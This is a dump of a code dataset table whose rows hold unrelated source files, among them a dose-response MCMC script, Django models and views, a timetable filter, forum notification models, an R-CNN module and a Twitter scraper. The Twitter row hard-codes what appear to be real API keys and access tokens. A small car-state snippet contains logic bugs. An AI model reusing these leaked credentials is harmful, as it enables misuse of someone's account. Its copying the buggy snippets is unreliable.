index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
9,200 | 54833c19d68bb7a1817639ef761367ce75a3a46f | import numpy as np
import sys
import os
import cv2
if __name__ == "__main__":
    # Image-loading demo via cv2 was disabled; exercise a small fixed array
    # instead and print it as a plain nested list.
    sample = np.array([[1, 2], [1, 3], [1, 4]])
    print(sample.tolist())
    sys.stdout.flush()
|
9,201 | 2f6baf4de40224f5a3d00ded35e751184ab59d0d | import doseresponse as dr
import numpy as np
import scipy.stats as st
import numpy.random as npr
import argparse
import itertools as it
# get rid of for real version
import pandas as pd
import os
# Fix the RNG seed so posterior-predictive draws are reproducible run-to-run.
seed = 1
npr.seed(seed)
# Command-line options controlling which drug/channel combinations are run,
# how many samples are drawn, and whether plots are produced.
parser = argparse.ArgumentParser()
parser.add_argument("-s", "--samples", type=int, help="number of Hill and pIC50 samples for use in AP model",default=500)
parser.add_argument("-a", "--all", action='store_true', help='construct posterior predictive CDFs for Hill and pIC50 for all drugs and channels', default=False)
parser.add_argument("--num-cores", type=int, help="number of cores to parallelise drug/channel combinations",default=1)
parser.add_argument("-np", "--no-plots", action='store_true', help="don't make any plots, just save posterior predictive samples", default=False)
parser.add_argument("-tu", "--top-up", action='store_true', help="to use with --all, run on all drugs who don't already have MCMC files", default=False)
parser.add_argument("-sy", "--synthetic", action='store_true', help="use synthetic data (only one drug/channel combination exists currently", default=False)
parser.add_argument("-Ne", "--num_expts", type=int, help="how many experiments to fit to", default=0)
parser.add_argument("--data-file", type=str, help="csv file from which to read in data, in same format as provided crumb_data.csv")
args = parser.parse_args()
# Point the doseresponse module at the requested data file, then enumerate
# the drug/channel combinations to process.
dr.setup(args.data_file)
drugs_to_run, channels_to_run = dr.list_drug_channel_options(args.all)
def construct_posterior_predictive_cdfs(alphas, betas, mus, ss):
    """Average Fisk (Hill) and logistic (pIC50) CDFs/PDFs over MCMC samples.

    Parameters
    ----------
    alphas, betas : per-iteration Fisk scale / shape samples for the Hill coefficient.
    mus, ss : per-iteration logistic location / scale samples for pIC50.
    All four sequences must have the same length; burn-in is assumed to have
    been discarded by the caller.

    Returns
    -------
    tuple of (hill_x_range, hill_cdf, pic50_x_range, pic50_cdf,
    hill_pdf, pic50_pdf) — sample-averaged posterior predictive curves
    evaluated on fixed 501-point grids.
    """
    num_x_pts = 501
    hill_min, hill_max = 0., 4.
    pic50_min, pic50_max = -2., 12.
    hill_x_range = np.linspace(hill_min, hill_max, num_x_pts)
    pic50_x_range = np.linspace(pic50_min, pic50_max, num_x_pts)
    num_iterations = len(alphas)  # assuming burn-in already discarded
    hill_pdf_sum = np.zeros(num_x_pts)
    hill_cdf_sum = np.zeros(num_x_pts)
    pic50_pdf_sum = np.zeros(num_x_pts)
    pic50_cdf_sum = np.zeros(num_x_pts)
    # Bind the scipy entry points once outside the loop.
    fisk = st.fisk.cdf
    fisk_pdf = st.fisk.pdf
    logistic = st.logistic.cdf
    logistic_pdf = st.logistic.pdf
    # range() instead of the Python-2-only xrange(): identical iteration on
    # Python 2, and the function now also works under Python 3.
    for i in range(num_iterations):
        hill_cdf_sum += fisk(hill_x_range, c=betas[i], scale=alphas[i], loc=0)
        hill_pdf_sum += fisk_pdf(hill_x_range, c=betas[i], scale=alphas[i], loc=0)
        pic50_cdf_sum += logistic(pic50_x_range, mus[i], ss[i])
        pic50_pdf_sum += logistic_pdf(pic50_x_range, mus[i], ss[i])
    # Turn the sums into averages over the MCMC iterations.
    hill_cdf_sum /= num_iterations
    pic50_cdf_sum /= num_iterations
    hill_pdf_sum /= num_iterations
    pic50_pdf_sum /= num_iterations
    return hill_x_range, hill_cdf_sum, pic50_x_range, pic50_cdf_sum, hill_pdf_sum, pic50_pdf_sum
def run(drug_channel):
    """Build posterior predictive CDFs/PDFs for one (drug, channel) pair.

    Loads the hierarchical MCMC chain from disk, discards the first quarter
    as burn-in, averages the Fisk (Hill) and logistic (pIC50) distributions
    over the remaining samples, optionally plots the curves, always saves
    the averaged CDFs, and — when fitting to all experiments — saves
    inverse-CDF samples for use in AP models. Always returns None.
    """
    drug, channel = drug_channel
    print "\n\n{} + {}\n\n".format(drug,channel)
    num_expts, experiment_numbers, experiments = dr.load_crumb_data(drug,channel)
    # Optionally fit to only the first --num_expts experiments; AP-model
    # samples are only saved when fitting to everything.
    if (0 < args.num_expts < num_expts):
        num_expts = args.num_expts
        save_samples_for_APs = False
    else:
        print "Fitting to all experiments\n"
        save_samples_for_APs = True
    drug, channel, output_dir, chain_dir, figs_dir, chain_file = dr.hierarchical_output_dirs_and_chain_file(drug,channel,num_expts)
    try:
        # Chain columns 0-3 are assumed to be: alpha, beta (Fisk), mu, s
        # (logistic) — TODO confirm against the chain writer.
        mcmc = np.loadtxt(chain_file,usecols=range(4))
    except IOError:
        print "tried loading", chain_file
        print "No MCMC file found for {} + {}\n".format(drug,channel)
        return None
    total_iterations = mcmc.shape[0]
    # Discard the first quarter of the chain as burn-in (Python 2 integer division).
    burn = total_iterations/4
    mcmc = mcmc[burn:,:]
    hill_x_range, hill_cdf_sum, pic50_x_range, pic50_cdf_sum, hill_pdf_sum, pic50_pdf_sum = construct_posterior_predictive_cdfs(mcmc[:,0],mcmc[:,1],mcmc[:,2],mcmc[:,3])
    if (not args.no_plots):
        # Lazy import with the Agg backend so plotting works headless and is
        # only paid for when plots are requested.
        import matplotlib
        matplotlib.use('Agg')
        import matplotlib.pyplot as plt
        labels = ["Hill","pIC50"]
        # Side-by-side CDF panels sharing the y axis.
        fig = plt.figure(figsize=(8,4))
        ax1 = fig.add_subplot(121)
        ax1.plot(hill_x_range,hill_cdf_sum)
        ax1.set_xlim(hill_x_range[0],hill_x_range[-1])
        ax1.set_ylim(0,1)
        ax1.set_xlabel("Hill")
        ax1.set_ylabel("Cumulative distribution")
        ax1.grid()
        ax2 = fig.add_subplot(122,sharey=ax1)
        ax2.plot(pic50_x_range,pic50_cdf_sum)
        ax2.set_xlim(pic50_x_range[0],pic50_x_range[-1])
        ax2.set_xlabel("pIC50")
        ax2.grid()
        plt.setp(ax2.get_yticklabels(), visible=False)
        fig.tight_layout()
        fig.savefig(figs_dir+"{}_{}_posterior_predictive_cdfs.png".format(drug,channel))
        plt.close()
        # One standalone PDF figure per quantity.
        xs = [hill_x_range,pic50_x_range]
        ys = [hill_pdf_sum,pic50_pdf_sum]
        labels = ['$Hill$','$pIC50$']
        file_labels = ['hill','pic50']
        for i in xrange(2):
            fig = plt.figure(figsize=(5,4))
            ax = fig.add_subplot(111)
            ax.plot(xs[i],ys[i],color='blue')
            ax.grid()
            ax.set_xlabel(labels[i])
            ax.set_ylabel('Probability density')
            # Strip the surrounding $...$ markers from the label for the title.
            ax.set_title('{} posterior predictive'.format(labels[i][1:-1]))
            fig.tight_layout()
            fig.savefig(figs_dir+"{}_{}_{}_posterior_predictive.png".format(drug,channel,file_labels[i]))
            plt.close()
    # Always persist the averaged CDFs as (x, cdf) column pairs.
    hill_cdf_file, pic50_cdf_file = dr.hierarchical_posterior_predictive_cdf_files(drug,channel,num_expts)
    np.savetxt(hill_cdf_file,np.vstack((hill_x_range, hill_cdf_sum)).T)
    np.savetxt(pic50_cdf_file,np.vstack((pic50_x_range, pic50_cdf_sum)).T)
    # Inverse-transform sampling: uniform draws mapped through the averaged CDFs.
    hill_uniform_samples = npr.rand(args.samples)
    pic50_uniform_samples = npr.rand(args.samples)
    hill_interpolated_inverse_cdf_samples = np.interp(hill_uniform_samples,hill_cdf_sum,hill_x_range)
    pic50_interpolated_inverse_cdf_samples = np.interp(pic50_uniform_samples,pic50_cdf_sum,pic50_x_range)
    # save a number of MCMC samples for use in AP models
    # we currently have it set to 500
    # in theory, the more samples, the better the AP histograms will look!
    if save_samples_for_APs:
        samples_file = dr.hierarchical_hill_and_pic50_samples_for_AP_file(drug,channel)
        with open(samples_file,'w') as outfile:
            outfile.write('# {} samples of (Hill,pIC50) drawn from their posterior predictive distributions, as defined by MCMC samples\n'.format(args.samples))
            np.savetxt(outfile,np.vstack((hill_interpolated_inverse_cdf_samples,pic50_interpolated_inverse_cdf_samples)).T)
    print "\n{} + {} done!\n".format(drug,channel)
    return None
# Lazily pair every requested drug with every requested channel.
drugs_channels = it.product(drugs_to_run,channels_to_run)
# Serial path — also taken with a single drug, where parallelism buys nothing.
if (args.num_cores<=1) or (len(drugs_to_run)==1):
    for drug_channel in drugs_channels:
        #run(drug_channel)
        # try/except is good when running multiple MCMCs and leaving them overnight,say
        # if one or more crash then the others will survive!
        # however, if you need more "control", comment out the try/except, and uncomment the other run(drug_channel) line
        try:
            run(drug_channel)
        except Exception,e:
            print e
            print "Failed to run {} + {}!".format(drug_channel[0],drug_channel[1])
# run multiple MCMCs in parallel
elif (args.num_cores>1):
    import multiprocessing as mp
    # Leave one core free for the rest of the machine.
    num_cores = min(args.num_cores, mp.cpu_count()-1)
    pool = mp.Pool(processes=num_cores)
    # .get() with a huge timeout rather than a bare .get(): on Python 2 this
    # keeps the pool interruptible with Ctrl-C.
    pool.map_async(run,drugs_channels).get(9999999)
    pool.close()
    pool.join()
|
9,202 | 0c8b58acf33bdfa95984d29a75ae01e49d0da149 | from __future__ import unicode_literals
from django.db import models
# Create your models here.
class Group(models.Model):
    """A savings/loan group record; every attribute is an indexed free-form string.

    NOTE(review): loan_eligibility and account_number are CharFields where a
    numeric or FK type might be expected — confirm intended.
    """
    name = models.CharField(max_length=200, db_index=True)
    loan_eligibility = models.CharField(max_length=200, db_index=True)
    account_number = models.CharField(max_length=200, db_index=True)
    incharge = models.CharField(max_length=200, db_index=True)
    incharge2 = models.CharField(max_length=200, db_index=True)
class Member(models.Model):
    """A group member; contact and address data stored as free-form strings."""
    name = models.CharField(max_length=200, db_index=True)
    age = models.CharField(max_length=200)
    # The original declared `phone` twice; the second declaration silently
    # replaced the first, so only one field ever existed — duplicate removed.
    phone = models.CharField(max_length=200)
    address1 = models.CharField(max_length=200)
    address2 = models.CharField(max_length=200)
|
9,203 | 6339f5c980ab0c0fb778870196493ddd83963ae7 | from dateutil import parser
from datetime import datetime
from backend.crawler import calender_crawler
from backend.logic.schedule_by_time.schedule_utils import get_weeks_of_subject
from backend.logic.schedule_by_time.schedule_utils import get_time_str
# e.g. hôm nay, hôm qua, ngày mai, thứ 2, thứ tư, chủ nhật, thứ năm tuần trước, thứ bảy tuần này, 04-06-2020, 10/06/2020 ....
def filter_by_weekday(schedule_table, time_entity):
    """Return schedule rows that fall on the weekday named by time_entity
    during the current semester week.
    """
    time_str = get_time_str(time_entity)
    time = parser.parse(time_str)
    # Python weekday(): Monday == 0; the timetable uses the Vietnamese
    # convention where Monday is "thứ 2", hence the +2.
    weekday = time.weekday() + 2
    # Hoisted out of the loop: crawl_callender() performs a crawl, so the
    # original paid one network round-trip per schedule row for an invariant
    # value. It is now fetched exactly once per call.
    week_now = int(calender_crawler.crawl_callender()[1])
    schedule = []
    for row in schedule_table:
        # row['time'] is assumed to look like "Thu <d>, <hh>h..-..h.." —
        # the second token of the first comma-field is the weekday digit.
        weekday_of_subject = int(row['time'].split(',')[0].split(' ')[1].strip())
        weeks_of_subject = get_weeks_of_subject(row)
        if (weekday_of_subject == weekday) and (week_now in weeks_of_subject):
            schedule.append(row)
    return schedule
# e.g. sáng mai, tối hôm qua, chiều hôm nay, sáng thứ 4 tuần này, chiều thứ 5 tuần sau, ....
def filter_by_session(schedule_table, time_entity):
    """Keep only the requested day's subjects that fall in the requested
    session (morning / afternoon / evening), e.g. "sáng mai", "chiều hôm nay".
    """
    day_subjects = filter_by_weekday(schedule_table, time_entity)
    session_start = parser.parse(time_entity['value']['from']).hour
    result = []
    for subj in day_subjects:
        start_hour = int(subj['time'].split(',')[1].split('-')[0].split('h')[0].strip())
        # Session windows encoded by the entity's starting hour:
        #   4h  -> morning   (subject must start before 12h)
        #   12h -> afternoon (subject must start at/after 12h)
        #   18h -> evening   (subject must start at/after 18h)
        excluded = ((session_start == 4 and start_hour >= 12) or
                    (session_start == 12 and start_hour < 12) or
                    (session_start == 18 and start_hour < 18))
        if not excluded:
            result.append(subj)
    return result
# e.g. 9 giờ sáng mai, 7 giờ tối hôm qua, 4 giờ chiều thứ 2, ....
def filter_by_hour(schedule_table, time_entity):
    """Keep the requested day's subjects whose time slot covers the asked hour,
    e.g. "9 giờ sáng mai", "4 giờ chiều thứ 2".
    """
    day_subjects = filter_by_weekday(schedule_table, time_entity)
    asked_hour = parser.parse(get_time_str(time_entity)).hour
    result = []
    for subj in day_subjects:
        # The slot looks like "<start>h..-<end>h.." in the second comma-field.
        slot = subj['time'].split(',')[1]
        slot_start = int(slot.split('-')[0].split('h')[0].strip())
        slot_end = int(slot.split('-')[1].split('h')[0].strip())
        if slot_start <= asked_hour <= slot_end:
            result.append(subj)
    return result
# e.g. tuần sau, tuần trước, tuần này, ....
def filter_by_week(schedule_table, time_entity):
    """Return rows whose week list contains the current semester week.

    NOTE(review): `time_entity` is accepted but unused — asking about
    "tuần sau" / "tuần trước" still filters by the *current* week; confirm
    this is intended.
    """
    # Hoisted out of the loop: crawl_callender() is a crawl, so the original
    # performed one network round-trip per row for an invariant value.
    week_now = int(calender_crawler.crawl_callender()[1])
    schedule = []
    for row in schedule_table:
        if week_now in get_weeks_of_subject(row):
            schedule.append(row)
    return schedule
# e.g. tháng 3, tháng sau, tháng trước ....
def filter_by_month(schedule_table, time_entity):
    # TODO(review): month filtering not implemented — returns the input unchanged.
    return schedule_table
def filter_by_year(schedule_table, time_entity):
    # TODO(review): year filtering not implemented — returns the input unchanged.
    return schedule_table
def filter_by_multi_week(schedule_table, time_entity):
    # TODO(review): multi-week filtering not implemented — returns the input unchanged.
    return schedule_table
def filter_by_multi_month(schedule_table, time_entity):
    # TODO(review): multi-month filtering not implemented — returns the input unchanged.
    return schedule_table
def check_out_of_semester(time_entity):
    """Return True when the asked date falls outside the current semester's
    valid week range, False otherwise.
    """
    time_str = get_time_str(time_entity)
    date_str = time_str.split('T')[0]
    date_ask = datetime.strptime(date_str, '%Y-%m-%d')
    today = datetime.now()
    diff_days = (date_ask - today).days
    diff_weeks = diff_days // 7
    # Single crawl instead of two separate crawl_callender() calls: the
    # original fetched the calendar page once for the semester and again
    # for the week number.
    calendar_info = calender_crawler.crawl_callender()
    semester_now = calendar_info[0]
    week_now = int(calendar_info[1])
    week_asked = week_now + diff_weeks
    # Semester codes look like "20191"/"20192": the 5th character is the term.
    # Term 1 spans weeks 0-25; term 2 spans weeks 26-50.
    if (semester_now[4] == '1') and (week_asked > 25 or week_asked < 0):
        return True
    if (semester_now[4] == '2') and (week_asked <= 25 or week_asked > 50):
        return True
    return False
|
9,204 | 1e81e0f3cb2fb25fdef08a913aa1ff77d0c2a562 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from machina.apps.forum_conversation.abstract_models import AbstractPost
from machina.apps.forum_conversation.abstract_models import AbstractTopic
from machina.core.db.models import model_factory
from django.dispatch import receiver
from django.db.models.signals import post_save
from django.contrib.auth.models import User
from django.db import models
from django.utils.translation import ugettext_lazy as _
# Concrete Topic model generated from machina's AbstractTopic.
Topic = model_factory(AbstractTopic)
class UserNotification(models.Model):
    """A single in-app notification shown to a user, with a deep link to its
    source (created by Post.save and the make_notifications signal below)."""
    user = models.ForeignKey(User, on_delete=models.CASCADE)
    notification_content = models.CharField(max_length=100)
    notification_link = models.CharField(max_length=100)
    created_at = models.DateTimeField(auto_now_add=True)
class Post(AbstractPost):
    """machina Post extended to notify the poster when its flag or vote
    count changes across a save()."""
    # Snapshots of the counts as loaded, used in save() to detect changes.
    # Name-mangled to _Post__original_* because of the double underscore.
    __original_flags = None
    __original_votes = None
    def __init__(self, *args, **kwargs):
        super(Post, self).__init__(*args, **kwargs)
        self.__original_flags = self.flag_count
        self.__original_votes = self.vote_count
    def save(self, force_insert=False, force_update=False, *args, **kwargs):
        # Persist first so self.id exists for building the notification link.
        super(Post, self).save(force_insert, force_update, *args, **kwargs)
        notification_link = "/forum/{}-{}/topic/{}-{}/?post={}#{}".format(self.topic.forum.slug, self.topic.forum.id, self.topic.slug, self.topic.id, self.id, self.id)
        if self.__original_flags != self.flag_count:
            n = UserNotification(user=self.poster, notification_content="Flag updates on post {}".format(self.subject), notification_link=notification_link)
            n.save()
        if self.__original_votes != self.vote_count:
            n = UserNotification(user=self.poster, notification_content="Vote update on post {}".format(self.subject), notification_link=notification_link)
            n.save()
        # Re-baseline so a second save() on the same instance does not
        # re-notify for the same change.
        self.__original_flags = self.flag_count
        self.__original_votes = self.vote_count
class Userflags(models.Model):
    """Per-user aggregate flag counter, auto-created for every new User by
    the post_save receivers below."""
    user = models.OneToOneField(User, on_delete=models.CASCADE)
    flag_count = models.PositiveIntegerField(
        verbose_name=_('Flag count'), editable=False, blank=True, default=0)
@receiver(post_save, sender=User)
def create_userflags(sender, instance, created, **kwargs):
    """Create the companion Userflags row when a User is first created."""
    if created:
        Userflags.objects.create(user=instance)
@receiver(post_save, sender=User)
def save_userflags(sender, instance, **kwargs):
    """Keep the companion Userflags row saved whenever the User is saved."""
    instance.userflags.save()
@receiver(post_save, sender=Post)
def make_notifications(sender, instance, created, **kwargs):
    """Notify the topic starter whenever a post on their topic is created
    or edited."""
    user = instance.topic.poster
    notification_content = "You have a new notification"
    # Deep-link straight to the post inside its topic page.
    notification_link = "/forum/{}-{}/topic/{}-{}/?post={}#{}".format(instance.topic.forum.slug, instance.topic.forum.id, instance.topic.slug, instance.topic.id, instance.id, instance.id)
    if created:
        notification_content = "A new post was created on your topic {}".format(instance.topic.slug)
    else:
        # Fixed typo in the user-facing message: "contetn" -> "content".
        notification_content = "A post's content was edited on your topic {}".format(instance.topic.slug)
    n = UserNotification(user=user, notification_link=notification_link, notification_content=notification_content)
    n.save()
|
9,205 | afa20d7e9c7843a03090c00cc888d44a77fc29f3 | import urlparse
import twitter
import oauth2 as oauth
import re
import urllib
# Module-level memo cache: url -> final resolved URL (populated by url_follow).
url_checker = dict()
def twitter_auth():
    """Build an authenticated python-twitter Api client.

    SECURITY NOTE(review): the consumer and access credentials are hard-coded
    below (and now committed); they should be moved to environment variables
    or a config file and rotated.
    """
    consumer_key = 'IqsuEo5xfTdWwjD1GZNSA'
    consumer_secret = 'dtYmqEekw53kia3MJhvDagdByWGxuTiqJfcdGkXw8A'
    # The manual OAuth handshake below was replaced by pre-issued access
    # tokens passed straight to twitter.Api.
    request_token_url = 'https://api.twitter.com/oauth/request_token'
    access_token_url = 'http://api.twitter.com/oauth/access_token'
    authorize_url = 'http://api.twitter.com/oauth/authorize'
    #consumer = oauth.Consumer(consumer_key, consumer_secret)
    #client = oauth.Client(consumer)
    #resp, content = client.request(request_token_url, "GET")
    #request_token = dict(urlparse.parse_qsl(content))
    #access_token_key = request_token['oauth_token']
    #access_token_secret = request_token['oauth_token_secret']
    api = twitter.Api(consumer_key,consumer_secret,'36001624-5JrcK4i6UO69IFY6vxZdRYxKBqjB42mwjhoSzzSP6','jgKWIncNLnzBvvhFeVTE0lkMGi1PH222YCEHSZHY')
    return api
def twitter_pull(api, word):
    """Search Twitter for `word` and return up to 100 results as a new list."""
    return list(api.GetSearch(word, None, None, 100))
def twitter_extract_urls(api, tweets):
    """Extract URL-looking strings from tweet texts.

    Returns a list with one entry per tweet that produced any regex matches;
    each entry is the list of candidates stripped of surrounding punctuation.
    `api` is unused but kept for interface compatibility with the callers.
    """
    pattern = re.compile('([a-zA-Z0-9\-\.]+\.[a-zA-Z]{2,3}/*\S*)?$')
    urls = list()
    for tweet in tweets:
        found_urls = pattern.findall(tweet.text)
        # List comprehensions instead of map()/filter(): identical on
        # Python 2, and on Python 3 they return real lists rather than the
        # lazy iterators the original would have produced (breaking callers
        # that index or re-iterate the result).
        found_urls = [x.strip("?.()[]{}!@#$^&*;'.,") for x in found_urls]
        urls.append(found_urls)
    urls = [u for u in urls if u]
    return urls
def url_follow(url):
    """Resolve a scheme-less `url` to its final redirected URL, memoizing
    results in the module-level url_checker cache.

    Returns None (implicitly) when the fetch fails for any reason.
    """
    # `in` instead of dict.has_key(): identical on Python 2, and has_key()
    # no longer exists on Python 3.
    if url in url_checker:
        return url_checker.get(url)
    try:
        r1 = urllib.urlopen('http://'+url)
        url_checker.update({url: r1.geturl()})
        return r1.geturl()
    except Exception:
        # Best-effort: unreachable or malformed URLs resolve to None.
        # Narrowed from a bare `except:` so KeyboardInterrupt / SystemExit
        # are no longer swallowed.
        pass
def unique_urls(urls):
    """Resolve the first candidate of each URL list and count duplicates.

    Returns a list of {"url": ..., "count": ...} dicts, one per distinct
    resolved URL; candidates that fail to resolve (None) are dropped.
    """
    resolved = [url_follow(candidates[0]) for candidates in urls]
    # List comprehension instead of filter(None, ...): identical on Python 2
    # and still a real list on Python 3 (filter() is lazy there, which would
    # have broken the .count() calls below in the original).
    resolved = [u for u in resolved if u]
    # Counter makes the tally a single O(n) pass instead of one O(n)
    # .count() scan per distinct URL.
    from collections import Counter
    counts = Counter(resolved)
    return [{"url": url, "count": count} for url, count in counts.items()]
def compile_twitter_content(tweets, url_data):
    """Merge tweets and URL statistics into one scored content list.

    The first two tweets get a fixed score of 3; each URL is scored by its
    occurrence count.
    """
    content = list()
    # Slice instead of indexing tweets[0]/tweets[1]: fewer than two tweets
    # no longer raises IndexError, and behavior is unchanged otherwise.
    for tweet in tweets[:2]:
        content.append({'type': 'tweet', 'data': tweet, 'score': 3})
    for url in url_data:
        content.append({'type': 'url', 'data': url['url'], 'score': url['count']})
    return content
def twitter_similar_terms(tweets):
    """Count non-stop-word occurrences across all tweet texts.

    Returns a list of {"word": ..., "count": ...} dicts. The original built
    this list but never returned it (the function always returned None) —
    the missing return is the fix.

    NOTE(review): texts are concatenated without a separator, so the last
    word of one tweet can fuse with the first word of the next — confirm
    whether a joining space is wanted.
    """
    stop_words = ["a","i","it","am","at","on","in","of","to","is","so","too","my","the","and","but","are","very","here","even","from","them","then","than","this","that","though"]
    whole_text = ''
    for tweet in tweets:
        whole_text += (tweet.text)
    whole_text = whole_text.split()
    whole_text_list = list()
    for word in whole_text:
        if not word in stop_words:
            whole_text_list.append(word)
    whole_text_dictionary = [{"word": word, "count": whole_text_list.count(word)} for word in set(whole_text_list)]
    return whole_text_dictionary
def get_twitter_content(term):
    """Top-level pipeline: search Twitter for `term`, resolve and count the
    URLs found in the results, and return the merged scored content list.

    NOTE(review): twitter_similar_terms() is invoked but its result is
    discarded here — either wire it into the returned content or drop the call.
    """
    api = twitter_auth()
    tweets = twitter_pull(api, term)
    urls = twitter_extract_urls(api,tweets)
    url_data = unique_urls(urls)
    twitter_similar_terms(tweets)
    return compile_twitter_content(tweets,url_data)
|
9,206 | 83ecb6b6237d7ee61f762b191ebc891521067a41 | from collections import OrderedDict
import torch
from torch import nn, Tensor
import warnings
from typing import Tuple, List, Dict, Optional, Union
class GeneralizedRCNN(nn.Module):
    """Generic two-stage detector: transform -> backbone -> RPN -> RoI heads.

    Args:
        backbone: feature extractor; may return a single Tensor or an
            OrderedDict of named feature maps.
        rpn: region proposal network producing (proposals, proposal_losses).
        roi_heads: consumes features + proposals, producing
            (detections, detector_losses).
        transform: preprocesses the input batch and post-processes detections
            back to the original image sizes.
    """
    def __init__(self, backbone, rpn, roi_heads, transform):
        super(GeneralizedRCNN, self).__init__()
        self.transform = transform
        self.backbone = backbone
        self.rpn = rpn
        self.roi_heads = roi_heads

    def forward(self, images, targets=None):
        """Run detection on a list of image tensors.

        Args:
            images: list of (C, H, W) image tensors.
            targets: optional per-image dicts containing a "boxes" Tensor of
                shape [N, 4]; required in training mode.

        Returns:
            (losses, detections) tuple.

        Raises:
            ValueError: missing targets in training mode, malformed ground
                truth boxes, or degenerate (non-positive size) boxes.
        """
        if self.training and targets is None:
            raise ValueError("In training mode, targets should be passed")
        if self.training:
            assert targets is not None
            # GT box shape/dtype check
            for target in targets:
                boxes = target["boxes"]
                if isinstance(boxes, torch.Tensor):
                    if len(boxes.shape) != 2 or boxes.shape[-1] != 4:
                        # Fixed message typos and the missing space between
                        # the two f-string fragments ("tensorof" -> "tensor of").
                        raise ValueError(f"Expected target boxes to be a tensor "
                                         f"of shape [N, 4], got {boxes.shape}.")
                else:
                    raise ValueError(f"Expected target boxes to be of type "
                                     f"Tensor, got {type(boxes)}.")
        # Record original sizes so detections can be mapped back after the
        # transform resizes the batch.
        original_image_sizes: List[Tuple[int, int]] = []
        for img in images:
            val = img.shape[-2:]  # (height, width)
            assert len(val) == 2
            original_image_sizes.append((val[0], val[1]))
        images, targets = self.transform(images, targets)
        # Check for degenerate boxes: x2/y2 not strictly greater than x1/y1.
        if targets is not None:
            for target_idx, target in enumerate(targets):
                boxes = target["boxes"]
                degenerate_boxes = boxes[:, 2:] <= boxes[:, :2]
                if degenerate_boxes.any():
                    # Report only the first offending box.
                    bb_idx = torch.where(degenerate_boxes.any(dim=1))[0][0]
                    degen_bb: List[float] = boxes[bb_idx].tolist()
                    raise ValueError(f"All bounding boxes should have positive height and width."
                                     f" Found invalid box {degen_bb} for target at index {target_idx}")
        features = self.backbone(images.tensors)
        if isinstance(features, torch.Tensor):
            # Fixed: OrderedDict(['0', features]) is not a valid constructor
            # call — OrderedDict expects an iterable of (key, value) pairs
            # and the original raised ValueError/TypeError at runtime.
            features = OrderedDict([("0", features)])
        proposals, proposal_losses = self.rpn(images, features, targets)
        detections, detector_losses = self.roi_heads(features, proposals, images.image_sizes, targets)
        detections = self.transform.postprocess(detections, images.image_sizes, original_image_sizes)
        losses = {}
        losses.update(detector_losses)
        losses.update(proposal_losses)
        return losses, detections
|
9,207 | 2766339632200c26a8c6cd3abff28b1495870b9a | car_state = False
u_input = input(f'>')
if car_state == True:
print('Car is stopped!')
if u_input == 'start':
car_state = True
print('Car has started!')
elif u_input == 'stop':
car_state == False
print('Car has stopped!')
else:
print('''I don''t understand that...''') |
9,208 | d2c5d306591216e100b5bd8e8822b24fd137d092 | from django.shortcuts import render
from django.core.urlresolvers import reverse
from django.http import HttpResponseRedirect, HttpResponse
from .models import Document, Organization, UserProfile, Shop
#from .forms import DocUploadForm, ShopEditForm
from django.shortcuts import render_to_response, get_object_or_404
from django.contrib.auth.decorators import login_required
from django.contrib.auth import authenticate, login
from django.shortcuts import get_object_or_404
from django.contrib.auth.decorators import login_required
from django.forms import ModelForm
from django.utils.translation import ugettext_lazy as _
from django import forms
from .models import *
class DocUploadForm(forms.ModelForm):
    """Document upload form; organization and visibility fields are excluded
    because the views set them programmatically after save(commit=False)."""
    tags = forms.ModelMultipleChoiceField(queryset=Tag.objects.all())
    class Meta:
        model = Document
        # widgets = {'tags' : autocomplete_light.MultipleChoiceWidget('TagAutocomplete')}
        # autocomplete_fields = ('tags','topic','university',)
        exclude = ['organization','private_user','is_public','is_user_private','display']
class ShopForm(forms.Form):
    """Combined shop + employee-account creation form (used by shopCreate).

    Collects both the Shop details and the credentials for the employee
    User that will manage it.
    """
    shopName = forms.CharField(max_length=100)
    email = forms.EmailField(widget=forms.TextInput(attrs={'class': 'mandatory', 'placeholder': 'Email'}),
        label=_(u'email address'), required=False)
    address = forms.CharField(widget= forms.Textarea())
    pincode = forms.IntegerField()
    nearest_college = forms.CharField(max_length=200, required=False)
    nearest_town = forms.CharField(max_length=200, required=False)
    telephone = forms.CharField(max_length=14)
    longitude = forms.DecimalField(max_digits=11, decimal_places=7)
    latitude = forms.DecimalField(max_digits=11, decimal_places=7)
    username = forms.CharField(widget=forms.TextInput(attrs={'class': 'mandatory', 'placeholder': 'User Name'}),
        label=_(u'Username'))
    password = forms.CharField(widget=forms.PasswordInput(attrs={'class': 'mandatory', 'placeholder': 'Password'}, render_value=False),
        label=_(u'Password'))
    password1 = forms.CharField(widget=forms.PasswordInput(attrs={'class': 'mandatory', 'placeholder': ' Password Again'}, render_value=False),
        label=_(u'Password Again'))
    services = forms.ModelMultipleChoiceField(queryset=Service.objects.all())
    def clean(self):
        """
        Verify that the values entered into the two password fields
        match. Note that an error here will end up in
        ``non_field_errors()`` because it doesn't apply to a single
        field.
        """
        if 'password1' in self.cleaned_data and 'password' in self.cleaned_data:
            if self.cleaned_data['password1'] != self.cleaned_data['password']:
                raise forms.ValidationError(_(u'You must type the same password each time'))
        return self.cleaned_data
    # NOTE(review): the disabled validator below looks up by *username*
    # despite being named clean_email — fix before re-enabling.
    # def clean_email(self):
    #     if 'email' in self.cleaned_data:
    #         try:
    #             user = User.objects.get(username= self.cleaned_data["username"])
    #             raise forms.ValidationError(_(u'Already this Username is Registered'))
    #         except User.DoesNotExist:
    #             pass
    #     return self.cleaned_data["email"]
class ShopEditForm(forms.ModelForm):
    """Edit form for Shop; location and the active flag are not user-editable."""
    class Meta:
        model = Shop
        exclude = ['latitude','longitude','is_active']
@login_required
def indexEmp(request, shopid=None):
    """Employee index page.

    Fixed: `shopid` was referenced but never defined, so every call raised
    NameError; it is now an optional parameter (backward compatible).
    NOTE(review): this view is shadowed by a later `indexEmp` definition in
    this module, so it is effectively dead code — consider removing one.
    """
    context = {'shop': shopid}
    return render(request, 'index.html', context)
@login_required
def docUpload(request):
    """Upload a public document on behalf of the caller's organization.

    Owners (userType 1) and employees (userType 2) resolve their
    Organization differently; the new document is forced public and
    attached to it before saving.

    NOTE(review): form.is_valid() is never called before save(), so invalid
    POST data raises instead of re-rendering with errors; and `org` is
    unbound if userType is neither 1 nor 2 — confirm those cannot occur.
    """
    user = UserProfile.objects.get(user=request.user)
    if(request.method=='POST'):
        # import ipdb; ipdb.set_trace();
        if(user.userType == 1 ):
            org = Organization.objects.get(owner = request.user)
        elif(user.userType == 2):
            org = Organization.objects.get(employee = request.user)
        data = DocUploadForm(request.POST,request.FILES)
        # commit=False so organization/visibility can be set before the write.
